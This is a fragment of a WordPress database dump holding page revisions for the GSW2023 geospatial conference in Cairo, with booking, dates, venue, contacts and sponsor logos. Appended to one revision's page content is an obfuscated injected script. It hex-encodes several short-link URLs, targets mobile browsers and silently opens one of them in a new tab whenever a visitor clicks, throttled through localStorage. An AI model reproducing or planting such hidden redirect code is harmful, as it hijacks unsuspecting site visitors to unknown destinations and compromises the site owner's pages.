width=\"1/3\"][vc_column_text]\r\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\r\n<h4></h4>\r\n<a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a>\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]\r\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\r\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\r\n<img class=\"alignnone size-medium wp-image-4791 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]\r\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\r\n<h5 style=\"text-align: center;\">Dinner and Show on the Prime Le Lac Du Caire</h5>\r\n<img class=\"alignnone size-medium wp-image-4793 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<ul>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\r\n</li>\r\n</ul>\r\n[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<h2 style=\"text-align: center;\"></h2>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\r\n[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]\r\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\r\n[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\r\n<span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]\r\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\r\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\r\n[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-13 12:13:22','2023-08-13 12:13:22','',3066,'https://gsw2023.com/?p=5103',0,'revision','',0),
(5104,1,'2023-08-13 12:17:34','2023-08-13 12:17:34','<h1 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #000000;\"><strong>Under the auspices of </strong></span>\r\n<span style=\"font-size: 24pt; color: #000000;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span>\r\n<span style=\"font-size: 24pt; color: #000000;\"><strong>Prime Minister of the Arab Republic of Egypt</strong></span></h1>\r\n[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 115px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081933017{margin-top: 105px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\">Prime Sponsor</span></h4>\r\n&nbsp;\r\n\r\n<a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081968974{margin-top: 160px !important;}\"]\r\n\r\n<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081968955{margin-top: 115px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081337215{margin-top: 40px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n&nbsp;\r\n\r\n<a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689080719428{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 